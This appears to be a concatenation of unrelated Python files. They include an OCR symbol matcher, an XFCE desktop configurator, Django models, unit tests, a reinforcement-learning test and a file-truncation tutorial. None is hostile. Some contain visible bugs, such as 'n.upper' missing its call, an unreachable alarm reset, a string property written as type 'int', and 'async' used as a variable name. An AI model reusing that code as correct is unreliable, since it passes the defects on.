results = None
fields = ""
field_value = ""
for i in args['fields']:
fields = i
field_value = args['fields'][i]
try:
results = db.get_by_id(args['table'],fields,field_value)
except Exception as e:
return {
'error': str(e)
}
else:
respons = list()
for i in results:
index = 0
data = dict()
for a in i:
if a in col:
if dt_types[index] == 'INT':
data[a]=str(i[a])
else:
data[a]=str(i[a])
index += 1
respons.append(data)
return respons\n\n
"""
else:
function_value += """
def """+moduls_data[i]['action']+"""(args):
# your code here
return args\n\n
"""
myfile.write(function_value)
|
nilq/baby-python
|
python
|
import os
import sys
import openpype
from openpype.api import Logger
log = Logger().get_logger(__name__)
def main(env):
from openpype.hosts.fusion.api import menu
import avalon.fusion
# Registers pype's Global pyblish plugins
openpype.install()
# activate resolve from pype
avalon.api.install(avalon.fusion)
log.info(f"Avalon registred hosts: {avalon.api.registered_host()}")
menu.launch_openpype_menu()
if __name__ == "__main__":
result = main(os.environ)
sys.exit(not bool(result))
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
import math
import numpy as np
VELOCITIES = np.array([
(1, 0),
(np.sqrt(1/2+np.sqrt(1/8)), np.sqrt(1/6-np.sqrt(1/72))),
(np.sqrt(1/2), np.sqrt(1/6)),
(np.sqrt(1/2-np.sqrt(1/8)), np.sqrt(1/6+np.sqrt(1/72))),
(0, np.sqrt(1/3))
])
VELOCITIES.flags.writeable = False
assert np.allclose(np.square(VELOCITIES * [1, np.sqrt(3)]).sum(axis=1), 1)
def distance(velocities):
rounded = velocities.round()
delta = velocities - rounded
squared = np.square(delta)
return math.fsum(squared.flat)
# def distance(velocities):
# rounded = (velocities + 0.5).round() - 0.5
# delta = velocities - rounded
# processed = 1 / (np.square(delta) + 1)
# return processed.sum()
def main():
last_q = 0 / 1000000
last_d = distance(VELOCITIES * last_q)
improving = False
for i in range(1, 6000001):
q = i / 1000000
d = distance(VELOCITIES * q)
if d < last_d:
if not improving:
improving = True
elif d > last_d:
if improving:
improving = False
print("%.6f: %.7g" % (last_q, last_d))
last_q = q
last_d = d
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib
import json
import psycopg2
import psycopg2.extras
import re
import transforms
import signal
import sys
from get_pg_conn import get_pg_conn
# see https://filosophy.org/code/python-function-execution-deadlines---in-simple-examples/
class TimedOutExc(Exception):
pass
def deadline(timeout, *args):
def decorate(f):
def handler(signum, frame):
raise TimedOutExc()
def new_f(*args):
signal.signal(signal.SIGALRM, handler)
signal.alarm(timeout)
return f(*args)
signal.alarm(0)
new_f.__name__ = f.__name__
return new_f
return decorate
@deadline(5)
def attempt_match(args, matcher_id, transformed_word_ids_by_transformed_word, matches, transforms_applied, match_attempts_cur, transformed_words_cur, ocr_processor_id, figure_id, word, symbol_id, transformed_word):
if transformed_word:
matches.add(transformed_word)
if transformed_word not in transformed_word_ids_by_transformed_word:
# This might not be the best way to insert. TODO: look at the proper way to handle this.
transformed_words_cur.execute(
'''
INSERT INTO transformed_words (transformed_word)
VALUES (%s)
ON CONFLICT (transformed_word) DO UPDATE SET transformed_word = EXCLUDED.transformed_word
RETURNING id;
''',
(transformed_word, )
)
transformed_word_id = transformed_words_cur.fetchone()[0]
transformed_word_ids_by_transformed_word[transformed_word] = transformed_word_id
else:
transformed_word_id = transformed_word_ids_by_transformed_word[transformed_word]
else:
transformed_word_id = None
transform_args = []
for t in args[0:len(transforms_applied)]:
transform_args.append("-" + t["category"][0] + " " + t["name"])
if not word == '':
match_attempts_cur.execute('''
INSERT INTO match_attempts (ocr_processor_id, matcher_id, figure_id, word, transformed_word_id, symbol_id, transforms_applied)
VALUES (%s, %s, %s, %s, %s, %s, %s)
ON CONFLICT DO NOTHING;
''',
(ocr_processor_id, matcher_id, figure_id, word, transformed_word_id, symbol_id, " ".join(transform_args))
)
def match(args):
conn = get_pg_conn()
ocr_processors__figures_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
symbols_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
matchers_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
transformed_words_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
match_attempts_cur = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
# transforms_to_apply includes both mutations and normalizations
transforms_to_apply = []
for arg in args:
category = arg["category"]
name = arg["name"]
t = getattr(getattr(transforms, name), name)
transforms_to_apply.append({"transform": t, "name": name, "category": category})
transforms_json = []
for t in transforms_to_apply:
transform_json = {}
transform_json["category"] = t["category"]
name = t["name"]
transform_json["name"] = name
with open("./transforms/" + name + ".py", "r") as f:
code = f.read().encode()
transform_json["code_hash"] = hashlib.sha224(code).hexdigest()
transforms_json.append(transform_json)
transforms_json_str = json.dumps(transforms_json)
matchers_cur.execute(
'''
SELECT id FROM matchers WHERE transforms=%s;
''',
(transforms_json_str, )
)
matcher_ids = matchers_cur.fetchone()
if matcher_ids != None:
matcher_id = matcher_ids[0]
else:
matchers_cur.execute(
'''
INSERT INTO matchers (transforms)
VALUES (%s)
ON CONFLICT (transforms) DO UPDATE SET transforms = EXCLUDED.transforms
RETURNING id;
''',
(transforms_json_str, )
)
matcher_id = matchers_cur.fetchone()[0]
if matcher_id == None:
raise Exception("matcher_id not found!");
normalizations = []
for t in transforms_to_apply:
t_category = t["category"]
if t_category == "normalize":
normalizations.append(t)
try:
ocr_processors__figures_query = '''
SELECT ocr_processor_id, figure_id, jsonb_extract_path(result, 'textAnnotations', '0', 'description') AS description
FROM ocr_processors__figures ORDER BY ocr_processor_id, figure_id;
'''
ocr_processors__figures_cur.execute(ocr_processors__figures_query)
symbols_query = '''
SELECT id, symbol
FROM symbols;
'''
symbols_cur.execute(symbols_query)
# original symbol incl/
symbol_ids_by_symbol = {}
for s in symbols_cur:
symbol_id = s["id"]
symbol = s["symbol"]
normalized_results = [symbol]
for normalization in normalizations:
for normalized in normalized_results:
normalized_results = []
for n in normalization["transform"](normalized):
normalized_results.append(n)
if n not in symbol_ids_by_symbol:
symbol_ids_by_symbol[n] = symbol_id
# Also collect unique uppercased symbols for matching
if n.upper() not in symbol_ids_by_symbol:
symbol_ids_by_symbol[n.upper] = symbol_id
#with open("./symbol_ids_by_symbol.json", "a+") as symbol_ids_by_symbol_file:
# symbol_ids_by_symbol_file.write(json.dumps(symbol_ids_by_symbol))
transformed_word_ids_by_transformed_word = {}
transformed_words_cur.execute(
'''
SELECT id, transformed_word
FROM transformed_words;
'''
)
for row in transformed_words_cur:
transformed_word_id = row["id"]
transformed_word = row["transformed_word"]
transformed_word_ids_by_transformed_word[transformed_word] = transformed_word_id
successes = []
fails = []
for row in ocr_processors__figures_cur:
ocr_processor_id = row["ocr_processor_id"]
figure_id = row["figure_id"]
paragraph = row["description"]
if paragraph:
for line in paragraph.split("\n"):
words = set()
words.add(line.replace(" ", ""))
matches = set()
for w in line.split(" "):
words.add(w)
for word in words:
transforms_applied = []
transformed_words = [word]
for transform_to_apply in transforms_to_apply:
transforms_applied.append(transform_to_apply["name"])
for transformed_word_prev in transformed_words:
transformed_words = []
for transformed_word in transform_to_apply["transform"](transformed_word_prev):
# perform match for original and uppercased words (see elif)
try:
if transformed_word in symbol_ids_by_symbol:
attempt_match(
args, matcher_id, transformed_word_ids_by_transformed_word, matches,
transforms_applied, match_attempts_cur, transformed_words_cur, ocr_processor_id,
figure_id, word, symbol_ids_by_symbol[transformed_word], transformed_word)
elif transformed_word.upper() in symbol_ids_by_symbol:
attempt_match(
args, matcher_id, transformed_word_ids_by_transformed_word, matches,
transforms_applied, match_attempts_cur, transformed_words_cur, ocr_processor_id,
figure_id, word, symbol_ids_by_symbol[transformed_word.upper()], transformed_word.upper())
else:
transformed_words.append(transformed_word)
# except TimedOutExc as e:
# print "took too long"
except(Exception) as e:
print('Unexpected Error:', e)
print('figure_id:', figure_id)
print('word:', word)
print('transformed_word:', transformed_word)
print('transforms_applied:', transforms_applied)
raise
if len(matches) == 0:
attempt_match(args, matcher_id, transformed_word_ids_by_transformed_word, matches, transforms_applied, match_attempts_cur, transformed_words_cur, ocr_processor_id, figure_id, word, None, None)
if len(matches) > 0:
successes.append(line + ' => ' + ' & '.join(matches))
else:
fails.append(line)
conn.commit()
with open("./outputs/successes.txt", "a+") as successesfile:
successesfile.write('\n'.join(successes))
with open("./outputs/fails.txt", "a+") as failsfile:
failsfile.write('\n'.join(fails))
print('match: SUCCESS')
except(psycopg2.DatabaseError) as e:
print('Database Error %s' % psycopg2.DatabaseError)
print('Database Error (same one): %s' % e)
print('Database Error (same one):', e)
raise
except(Exception) as e:
print('Unexpected Error:', e)
raise
finally:
if conn:
conn.close()
|
nilq/baby-python
|
python
|
# vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4:
import unittest
from karmia import KarmiaContext
class TestKarmiaContextSet(unittest.TestCase):
def test_parameter(self):
context = KarmiaContext()
key = 'key'
value = 'value'
context.set(key, value)
self.assertEqual(context.parameters[key], value)
def test_object(self):
context = KarmiaContext()
parameter = {'key': 'value'}
context.set(parameter)
self.assertEqual(context.parameters['key'], parameter['key'])
def test_merge(self):
context = KarmiaContext()
parameter1 = {'key1': 'value1'}
parameter2 = {'key2': 'value2'}
context.set(parameter1)
context.set(parameter2)
self.assertEqual(context.parameters['key1'], parameter1['key1'])
self.assertEqual(context.parameters['key2'], parameter2['key2'])
class TestKarmiaContextGet(unittest.TestCase):
def test_parameter(self):
context = KarmiaContext()
key = 'key'
value = 'value'
context.set(key, value)
self.assertEqual(context.get(key), value)
def test_default_parameter(self):
context = KarmiaContext()
key = 'key'
default_value = 'default_value'
self.assertEqual(context.get(key, default_value), default_value)
class TestKarmiaContextRemove(unittest.TestCase):
def test_remove(self):
context = KarmiaContext()
key = 'key'
value = 'value'
context.set(key, value)
self.assertEqual(context.get(key), value)
context.remove(key)
self.assertEqual(context.get(key), None)
class TestKarmiaContextChild(unittest.TestCase):
def test_extend(self):
context = KarmiaContext()
key1 = 'key1'
key2 = 'key2'
values1 = {'value1': 1}
values2 = {'value2': 2}
context.set(key1, values1)
child = context.child()
self.assertEqual(child.get(key1), values1)
child.set(key2, values2)
self.assertEqual(child.get(key1), values1)
self.assertEqual(child.get(key2), values2)
self.assertEqual(context.get(key1), values1)
self.assertEqual(context.get(key2), None)
class TestAnnotate(unittest.TestCase):
def test_annotate_function(self):
context = KarmiaContext()
fn = lambda value1, value2: value1 + value2
self.assertEqual(list(context.annotate(fn).keys()), ['value1', 'value2'])
def test_no_arguments(self):
context = KarmiaContext()
fn = lambda: 'result'
self.assertEqual(list(context.annotate(fn).keys()), [])
class TestInvoke(unittest.TestCase):
def test_invoke(self):
context = KarmiaContext()
fn = lambda value1, value2: value1 + value2
parameters = {'value1': 1, 'value2': 2}
self.assertEqual(context.invoke(fn, parameters), parameters['value1'] + parameters['value2'])
class TestCall(unittest.TestCase):
def test_return(self):
context = KarmiaContext()
fn = lambda value1, value2: value1 + value2
parameters = {'value1': 1, 'value2': 2}
self.assertEqual(context.call(fn, parameters), parameters['value1'] + parameters['value2'])
def callback(self):
def fn(value1, value2, callback):
callback(None, value1 + value2)
def callback(error, result):
self.assertIsNone(error)
self.assertEqual(result, parameters['value1', 'value2'])
context = KarmiaContext()
parameters = {'value1': 1, 'value2': 2}
context.call(fn, parameters, callback)
def test_no_parameters(self):
context = KarmiaContext()
result = 'result'
fn = lambda: result
self.assertEqual(context.call(fn), result)
def test_merge_parameters(self):
context = KarmiaContext()
key = 'value1'
value = 1
parameters = {'value2': 2}
fn = lambda value1, value2: value1 + value2
context.set(key, value)
self.assertEqual(context.call(fn, parameters), value + parameters['value2'])
class TestAsync(unittest.TestCase):
def callback(self):
def fn(value1, value2, callback):
return callback(None, value1 + value2)
def callback(error, result):
self.assertIsNone(error)
self.assertEqual(result, parameters['value1', 'value2'])
context = KarmiaContext()
parameters = {'value1': 1, 'value2': 2}
async = context.async(fn, parameters)
self.assertTrue(callable(async))
async(callback)
# Local variables:
# tab-width: 4
# c-basic-offset: 4
# c-hanging-comment-ender-p: nil
# End:
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: MIT
# Copyright (c) 2018-2021 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Apply some settings to an XFCE Desktop environment
* Keyboard shortcuts
* Panel configuration
"""
import argparse
import collections
import json
import logging
import re
import os
import os.path
import subprocess
import sys
SHORTCUTS = (
# Use urxvt as Alt+F3 if it is available, otherwise a terminal
('<Alt>F3', ('urxvt', 'xfce4-terminal', 'exo-open --launch TerminalEmulator')),
# Lock screen with Ctrl+Alt+L
('<Primary><Alt>l', ('xflock4', )),
# Take a screenshot with the screenshooter
('Print', ('xfce4-screenshooter', )),
)
logger = logging.getLogger(__name__)
class ActionArguments(object): # pylint: disable=too-few-public-methods
"""Arguments to the program"""
def __init__(self, do_for_real, verbose, home_dir):
self.do_for_real = do_for_real
self.verbose = verbose
self.home_dir = os.path.expanduser(home_dir or '~')
def silent_run(cmd):
"""Run the given command, dropping its output, and return False if it failed"""
logger.debug("running %s", ' '.join(cmd))
try:
subprocess.check_output(cmd)
return True
except subprocess.CalledProcessError as exc:
logger.error("%s", exc)
return False
except OSError as exc:
logger.error("%s", exc)
return False
def try_run(cmd):
"""Try running the command and return its output on success, None on failure"""
logger.debug("running: %s", ' '.join(cmd))
try:
return subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError:
return None
def find_prog_in_path(prog):
"""Find the given program in the default $PATH"""
for path_dir in ('/usr/bin', '/usr/sbin', '/bin', '/sbin'):
path_prog = '{0}/{1}'.format(path_dir, prog)
if os.path.exists(path_prog):
return path_prog
return None
def get_xfce4_shortcut(key):
"""Get the shortcut associated with the given key"""
result = try_run([
'xfconf-query', '--channel', 'xfce4-keyboard-shortcuts',
'--property', '/commands/custom/{0}'.format(key)])
if result is None:
result = try_run([
'xfconf-query', '--channel', 'xfce4-keyboard-shortcuts',
'--property', '/commands/default/{0}'.format(key)])
return result if result is None else result.decode('utf-8').rstrip('\n')
def set_xfce4_shortcut(act_args, key, cmd):
"""Set the shortcut associated with the given key"""
current_cmd = get_xfce4_shortcut(key)
if current_cmd == cmd:
if act_args.verbose:
logger.info("shortcut %s is already %r", key, cmd)
return True
if not act_args.do_for_real:
logger.info("[dry run] shortcut %s: %r -> %r", key, current_cmd, cmd)
return True
logger.info("shortcut %s: %r -> %r", key, current_cmd, cmd)
return silent_run([
'xfconf-query', '--channel', 'xfce4-keyboard-shortcuts',
'--property', '/commands/custom/{0}'.format(key),
'--type', 'string', '--create', '--set', cmd])
def set_xfce4_shortcut_avail(act_args, key, progs):
"""Set the shortcut associated with the given key to the first available program"""
for cmdline in progs:
# Split the command line to find the used program
cmd_split = cmdline.split(None, 1)
cmd_split[0] = find_prog_in_path(cmd_split[0])
if cmd_split[0] is not None:
return set_xfce4_shortcut(act_args, key, ' '.join(cmd_split))
logger.warning("no program found for shortcut %s", key)
return True
def configure_xfce4_shortcuts(act_args):
for key, progs in SHORTCUTS:
if not set_xfce4_shortcut_avail(act_args, key, progs):
return False
return True
class Xfce4Panels(object):
"""Represent the state of the panels
c.f. xfconf-query --channel xfce4-panel --list --verbose
"""
# Key => type, default value
panel_properties = (
('autohide-behavior', int, 0),
('length', int, 0),
('plugin-ids', [int], []),
('position', str, ''),
('position-locked', bool, False),
('size', int, 0),
)
# Name, key => type
plugin_properties = (
('clock', 'digital-format', str),
('directorymenu', 'base-directory', str),
('launcher', 'items', [str]),
('separator', 'style', int),
('separator', 'expand', bool),
('systray', 'names-visible', [str]),
)
def __init__(self, act_args):
self.act_args = act_args
self.panels = None
self.panel_plugins = None
self.available_plugins = None
@staticmethod
def read_prop(prop, prop_type, default):
"""Read a property of xfce4-panel channel of the given type"""
is_list = isinstance(prop_type, list) and len(prop_type) == 1 and default in ([], None)
assert is_list or default is None or isinstance(default, prop_type)
result = try_run([
'xfconf-query', '--channel', 'xfce4-panel',
'--property', prop])
if result is None:
return [] if is_list and default is not None else default
lines = result.decode('utf-8').splitlines()
if is_list:
if len(lines) <= 2 or not lines[0].endswith(':') or lines[1] != '':
raise ValueError("unexpected xfce4-panel%s value: %r" % (prop, lines))
return [prop_type[0](line) for line in lines[2:]]
if prop_type is bool and len(lines) == 1:
if lines[0] == 'true':
return True
if lines[0] == 'false':
return False
if prop_type is int and len(lines) == 1:
return int(lines[0])
if prop_type is str and len(lines) == 1:
return lines[0]
raise NotImplementedError("unable to convert result to %r: %r" % (prop_type, lines))
def set_panel_prop(self, panel_id, prop_name, value):
"""Set a panel property"""
for prop, prop_type, default in self.panel_properties:
if prop == prop_name:
is_list = isinstance(prop_type, list) and len(prop_type) == 1
if is_list:
assert all(isinstance(v, prop_type[0]) for v in value), \
"Wrong value type for panel property %s" % prop_name
else:
assert isinstance(value, prop_type), \
"Wrong value type for panel property %s" % prop_name
# Prepare the arguments for xfconf-query
if is_list:
text_type = 'list'
text_value = str(value) # TODO: how to modify lists?
elif prop_type is bool:
text_type = 'bool'
text_value = 'true' if value else 'false'
elif prop_type is int or prop_type is str:
text_type = 'int'
text_value = str(value)
elif prop_type is str:
text_type = 'string'
text_value = value
else:
raise NotImplementedError("unable to write a property of type %r" % prop_type)
# Get the current value
prop_path = '/panels/panel-{0}/{1}'.format(panel_id, prop_name)
current_val = self.panels[panel_id][prop_name]
if current_val == value:
if self.act_args.verbose:
logger.info("%s is already %r", prop_path, value)
return True
if not self.act_args.do_for_real:
logger.info("[dry run] %s: %r -> %r", prop_path, current_val, value)
return True
logger.info("%s: %r -> %r", prop_path, current_val, value)
result = silent_run([
'xfconf-query', '--channel', 'xfce4-panel',
'--property', prop_path,
'--create', '--type', text_type, '--set', text_value])
if not result:
return result
# Sanity check
new_value = self.read_prop(prop_path, prop_type, default)
if new_value == current_val:
logger.error("failed to set %s to %r (old value stayed)", prop_path, value)
return False
if new_value != value:
logger.error("failed to set %s to %r (new value %r)", prop_path, value, new_value)
return False
return True
raise NotImplementedError("unknown panel property %s" % prop_name)
def read_file(self, file_rel_path):
"""Read a configuration file"""
abs_path = os.path.join(
self.act_args.home_dir, '.config', 'xfce4', 'panel', file_rel_path)
logger.debug("reading %s", abs_path)
try:
with open(abs_path, 'r') as stream:
return stream.read().splitlines()
except OSError:
return None
def read_panels(self):
"""Retrieve the currently configured panels"""
panel_ids = self.read_prop('/panels', [int], [])
if not panel_ids:
logger.error("failed to retrieve xfce4-panel/panels enumeration")
return False
self.panels = collections.OrderedDict()
self.panel_plugins = collections.OrderedDict()
for panel_id in panel_ids:
if panel_id in self.panels:
logger.error("duplicated xfce4-panel/panels ID %d", panel_id)
return False
prop_prefix = '/panels/panel-{0}/'.format(panel_id)
self.panels[panel_id] = {}
for prop, prop_type, default in self.panel_properties:
try:
self.panels[panel_id][prop] = self.read_prop(prop_prefix + prop, prop_type, default)
except ValueError as exc:
logger.error("%s", exc)
return False
self.panel_plugins[panel_id] = collections.OrderedDict()
for plugin_id in self.panels[panel_id]['plugin-ids']:
# Read the plugin config
prop_prefix = '/plugins/plugin-{0}'.format(plugin_id)
plugin_name = self.read_prop(prop_prefix, str, '')
self.panel_plugins[panel_id][plugin_id] = collections.OrderedDict()
self.panel_plugins[panel_id][plugin_id]['name'] = plugin_name
for plname, prop, prop_type in self.plugin_properties:
if plname != plugin_name:
continue
val = self.read_prop(prop_prefix + '/' + prop, prop_type, None)
if val is not None:
self.panel_plugins[panel_id][plugin_id][prop] = val
# Read the files associated with the plugin
if plugin_name == 'launcher':
# Load the .desktop file associated with a launcher
items = self.panel_plugins[panel_id][plugin_id].get('items')
if items:
self.panel_plugins[panel_id][plugin_id]['item-files'] = collections.OrderedDict()
for item_name in items:
content = self.read_file('{0}-{1}/{2}'.format(plugin_name, plugin_id, item_name))
self.panel_plugins[panel_id][plugin_id]['item-files'][item_name] = content
elif plugin_name in ('cpugraph', 'fsguard', 'netload', 'systemload'):
content = self.read_file('{0}-{1}.rc'.format(plugin_name, plugin_id))
if content is not None:
self.panel_plugins[panel_id][plugin_id]['rc-file'] = content
return True
def read_available_plugins(self):
"""Load the available panel plugins"""
plugins_path = '/usr/share/xfce4/panel/plugins'
logger.debug("loading files from %s", plugins_path)
available_plugins = set()
for filename in os.listdir(plugins_path):
if filename.endswith('.desktop'):
with open(os.path.join(plugins_path, filename), 'r') as fplugin:
for line in fplugin:
if re.match(r'^X-XFCE-Module\s*=\s*(\S+)', line):
# The .desktop file is a module. Let's add its name!
available_plugins.add(filename[:-8])
break
self.available_plugins = available_plugins
return True
def read_config(self):
"""Load all configuration options related to the panels"""
if not self.read_panels():
return False
if not self.read_available_plugins():
return False
return True
def dump_config(self, stream):
"""Print the loaded configuration"""
json.dump(
collections.OrderedDict((('panels', self.panels), ('plugins', self.panel_plugins))),
stream, indent=2)
stream.write('\n')
def configure(self):
"""Apply configuration of the panels"""
for panel_id, panel_config in sorted(self.panels.items()):
if panel_config['position'] == 'p=10;x=0;y=0':
# Bottom panel
logger.info("Found bottom panel with ID %d", panel_id)
if not self.set_panel_prop(panel_id, 'position-locked', True):
return False
if not self.set_panel_prop(panel_id, 'length', 0):
return False
# "Automatically hide the panel" -> "Always"
if not self.set_panel_prop(panel_id, 'autohide-behavior', 2):
return False
elif panel_config['position'] == 'p=6;x=0;y=0':
# Top panel
logger.info("Found top panel with ID %d", panel_id)
if not self.set_panel_prop(panel_id, 'position-locked', True):
return False
if not self.set_panel_prop(panel_id, 'length', 100):
return False
if not self.set_panel_prop(panel_id, 'autohide-behavior', 0):
return False
return True
def main(argv=None):
parser = argparse.ArgumentParser(
description="Apply settings to an XFCE Desktop environment")
parser.add_argument('-d', '--debug', action='store_true',
help="show debug messages")
parser.add_argument('-n', '--dry-run',
dest='real', action='store_false', default=False,
help="show what would change with --real (default)")
parser.add_argument('-r', '--real', action='store_true',
help="really change the settings")
parser.add_argument('-v', '--verbose', action='store_true',
help="show the settings which would not be modified")
parser.add_argument('-H', '--home', type=str,
help="$HOME environment variable to use")
parser.add_argument('-P', '--show-panels', action='store_true',
help="show panels configuration")
args = parser.parse_args(argv)
logging.basicConfig(
format='[%(levelname)s] %(message)s',
level=logging.DEBUG if args.debug else logging.INFO)
# Try using xfconf-query --version
if not silent_run(['xfconf-query', '--version']):
logger.fatal("xfconf-query does not work")
return False
act_args = ActionArguments(args.real, args.verbose, args.home)
if not configure_xfce4_shortcuts(act_args):
return False
panels = Xfce4Panels(act_args)
if not panels.read_config():
return False
if args.show_panels:
panels.dump_config(sys.stdout)
if not panels.configure():
return False
return True
if __name__ == '__main__':
sys.exit(0 if main() else 1)
|
nilq/baby-python
|
python
|
# import argv variable so we can take command line arguments
from sys import argv
# extract the command line arguments from argv and store them in variables
script, filename = argv
# print a formatted string with the filename command line arugment inserted
print(f"We're going to erase {filename}")
# print a string
print("If you don't want that, hit CTRL-C (^C)")
# print a string
print("if you do want that, hit RETURN.")
# get input from the user on whether or not they want to erase the contents of filename
input("?")
# print a string
print("Opening the file...")
# open the file referenced by filename in write mode (which truncates the file) and store the returned file object in target
target = open(filename, 'w')
# print a string
print("Truncating the file. Goodbye!")
# truncate the file object stored in target
target.truncate()
# print a string
print("Now I'm going to ask you for three lines.")
# get user input for line 1 and store in line1
line1 = input("line 1: ")
# get user input for line 2 and store in line2
line2 = input("line 2: ")
# get user input for line 3 and store in line3
line3 = input("line 3: ")
# print a string
print("I'm going to write these to the file.")
# write string stored in line1 to file object in target
target.write(line1)
# write a newline character to file object in target
target.write("\n")
# write string stored in line2 to file object in target
target.write(line2)
# write a newline character to file object in target
target.write("\n")
# write string stored in line3 to file object in target
target.write(line3)
# write a newline character to file object in target
target.write("\n")
# print a string
print("And finally we close it.")
# close the file object in target.
target.close()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
from django.conf.urls import include, url
from django.contrib import admin
from s_analyzer.apps.rest.api import router
from s_analyzer.site.views import HomeView
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^$', HomeView.as_view(), name="home"),
]
|
nilq/baby-python
|
python
|
from django.db import models
from re import sub
# Create your models here.
class Movie(models.Model):
movie_name = models.CharField(max_length=250, unique=True, blank=False, null=False)
movie_year = models.IntegerField()
imdb_rating = models.DecimalField(max_digits=3, decimal_places=2, blank=True, null=True)
imdb_link = models.URLField(blank=True, null=True)
down720_link = models.URLField(blank=True, null=True)
down1080_link = models.URLField(blank=True, null=True)
image_available = models.BooleanField(default=False)
created_on = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{} {}'.format(self.movie_name, self.movie_year)
def human_readable_name(self):
return sub('[/ ]+', '_', self.movie_name)
class Actor(models.Model):
actor_name = models.CharField(max_length=100, blank=False, null=False)
movies = models.ManyToManyField(Movie)
def __str__(self):
return self.actor_name
class Director(models.Model):
director_name = models.CharField(max_length=100, blank=False, null=False)
movies = models.ManyToManyField(Movie)
def __str__(self):
return self.director_name
class Genre(models.Model):
genre = models.CharField(max_length=100, blank=False, null=False)
movies = models.ManyToManyField(Movie)
def __str__(self):
return self.genre
|
nilq/baby-python
|
python
|
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from datetime import datetime
from helper.utils import TestUtils as tu
from mushroom_rl.core import Agent
from mushroom_rl.algorithms.actor_critic import SAC
from mushroom_rl.core import Core
from mushroom_rl.environments.gym_env import Gym
class CriticNetwork(nn.Module):
def __init__(self, input_shape, output_shape, **kwargs):
super().__init__()
n_input = input_shape[-1]
n_output = output_shape[0]
self._h = nn.Linear(n_input, n_output)
nn.init.xavier_uniform_(self._h.weight,
gain=nn.init.calculate_gain('relu'))
def forward(self, state, action):
state_action = torch.cat((state.float(), action.float()), dim=1)
q = F.relu(self._h(state_action))
return torch.squeeze(q)
class ActorNetwork(nn.Module):
def __init__(self, input_shape, output_shape, **kwargs):
super(ActorNetwork, self).__init__()
n_input = input_shape[-1]
n_output = output_shape[0]
self._h = nn.Linear(n_input, n_output)
nn.init.xavier_uniform_(self._h.weight,
gain=nn.init.calculate_gain('relu'))
def forward(self, state):
return F.relu(self._h(torch.squeeze(state, 1).float()))
def learn_sac():
# MDP
horizon = 200
gamma = 0.99
mdp = Gym('Pendulum-v0', horizon, gamma)
mdp.seed(1)
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
# Settings
initial_replay_size = 64
max_replay_size = 50000
batch_size = 64
n_features = 64
warmup_transitions = 10
tau = 0.005
lr_alpha = 3e-4
# Approximator
actor_input_shape = mdp.info.observation_space.shape
actor_mu_params = dict(network=ActorNetwork,
n_features=n_features,
input_shape=actor_input_shape,
output_shape=mdp.info.action_space.shape,
use_cuda=False)
actor_sigma_params = dict(network=ActorNetwork,
n_features=n_features,
input_shape=actor_input_shape,
output_shape=mdp.info.action_space.shape,
use_cuda=False)
actor_optimizer = {'class': optim.Adam,
'params': {'lr': 3e-4}}
critic_input_shape = (
actor_input_shape[0] + mdp.info.action_space.shape[0],)
critic_params = dict(network=CriticNetwork,
optimizer={'class': optim.Adam,
'params': {'lr': 3e-4}},
loss=F.mse_loss,
n_features=n_features,
input_shape=critic_input_shape,
output_shape=(1,),
use_cuda=False)
# Agent
agent = SAC(mdp.info, actor_mu_params, actor_sigma_params, actor_optimizer,
critic_params, batch_size, initial_replay_size, max_replay_size,
warmup_transitions, tau, lr_alpha,
critic_fit_params=None)
# Algorithm
core = Core(agent, mdp)
core.learn(n_steps=2 * initial_replay_size,
n_steps_per_fit=initial_replay_size)
return agent
def test_sac():
policy = learn_sac().policy
w = policy.get_weights()
w_test = np.array([ 1.6998193, -0.732528, 1.2986078, -0.26860124,
0.5094043, -0.5001421, -0.18989229, -0.30646914])
assert np.allclose(w, w_test)
def test_sac_save(tmpdir):
agent_path = tmpdir / 'agent_{}'.format(datetime.now().strftime("%H%M%S%f"))
agent_save = learn_sac()
agent_save.save(agent_path, full_save=True)
agent_load = Agent.load(agent_path)
for att, method in vars(agent_save).items():
save_attr = getattr(agent_save, att)
load_attr = getattr(agent_load, att)
tu.assert_eq(save_attr, load_attr)
|
nilq/baby-python
|
python
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
